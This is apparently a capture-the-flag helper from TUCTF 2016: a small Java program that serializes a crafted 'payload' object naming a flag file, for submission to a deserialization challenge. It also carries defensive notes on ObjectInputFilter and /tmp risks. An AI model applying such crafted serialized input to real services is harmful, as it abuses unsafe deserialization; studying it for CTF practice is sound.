Simple Java object serializer
/*
 *
 * @0xBADCA7 and github/0xBADCA7
 * How to serialize Java objects. This is from TUCTF 2016.
 *
 * Compile on the command line, not from an IDE. An IDE typically inserts a
 * package declaration, which changes the fully qualified class name and the
 * class's computed serialVersionUID, so the generated stream would no longer
 * match the classes the consuming JVM expects:
 * javac Main.java && java Main && cat /tmp/serialized.bin
 *
 */
import java.io.FileOutputStream; | |
import java.io.ObjectOutputStream; | |
import java.io.Serializable; | |
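public class Main {
    /** Output path for the serialized stream; the file is overwritten on every run. */
    static String SAVE_PATH = "/tmp/serialized.bin";

    /**
     * Builds an example object and writes it to {@link #SAVE_PATH} with
     * {@link ObjectOutputStream}.
     *
     * Replace {@code f} with whatever object you need serialized. Every class
     * reachable from it must implement {@link java.io.Serializable}, and its
     * name, package and serialVersionUID must match what the consuming JVM has
     * on its classpath, otherwise readObject fails there (InvalidClassException /
     * ClassNotFoundException).
     *
     * Security notes:
     *  - The consuming side (ObjectInputStream.readObject on bytes it did not
     *    produce itself) is the classic Java deserialization sink; anyone
     *    reading such a file from an untrusted source should install an
     *    ObjectInputFilter (JEP 290) or avoid native serialization entirely.
     *  - SAVE_PATH is a fixed name in the shared /tmp directory, so another
     *    local user can pre-create it or plant a symlink there. Fine for a CTF
     *    scratch file; use a private directory for anything else.
     *
     * @param args ignored
     * @throws Exception if the file cannot be created or the object graph is
     *     not serializable (NotSerializableException)
     */
    public static void main(String[] args) throws Exception {
        System.out.print("This tool generates serialized Java objects\r\n\r\n");

        // Example payload: swap this for the object you actually need.
        OSFile f = new UnixFile();
        f.file = "flaG";

        // try-with-resources closes (and so flushes) the stream even when
        // writeObject throws; the original never closed the file handle.
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SAVE_PATH))) {
            oos.writeObject(f); // your object goes here instead of "f"
            oos.flush();
        }
        System.out.print("Serialized to " + SAVE_PATH + "\r\n");
    }
}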
// This belongs to the example only
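/**
 * Example concrete subclass used as the serialized payload.
 *
 * No serialVersionUID is declared, so the JVM computes one from the class
 * shape (fields, methods, modifiers). Any edit to this class changes that
 * value and the stream will be rejected by a consumer compiled from the
 * original class; keep it byte-for-byte identical to the target's copy.
 */
class UnixFile extends OSFile
{
    /**
     * Returns the hard-coded example name.
     *
     * Only instance state ({@code file}, set in Main) ends up in the
     * serialized stream; this return value does not.
     */
    @Override
    public String getFileName()
    {
        // Unix filenames are case-sensitive, don't change
        return "flaG";
    }
}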
// This belongs to the example only
/**
 * Base type of the example payload. Implements {@link Serializable} so that
 * instances of its subclasses can be passed to ObjectOutputStream.writeObject.
 */
abstract class OSFile implements Serializable
{
    /** Platform-specific file name, provided by the concrete subclass. */
    abstract String getFileName();

    /** The example "file" name; this field is the only state that is serialized. */
    String file = "";
}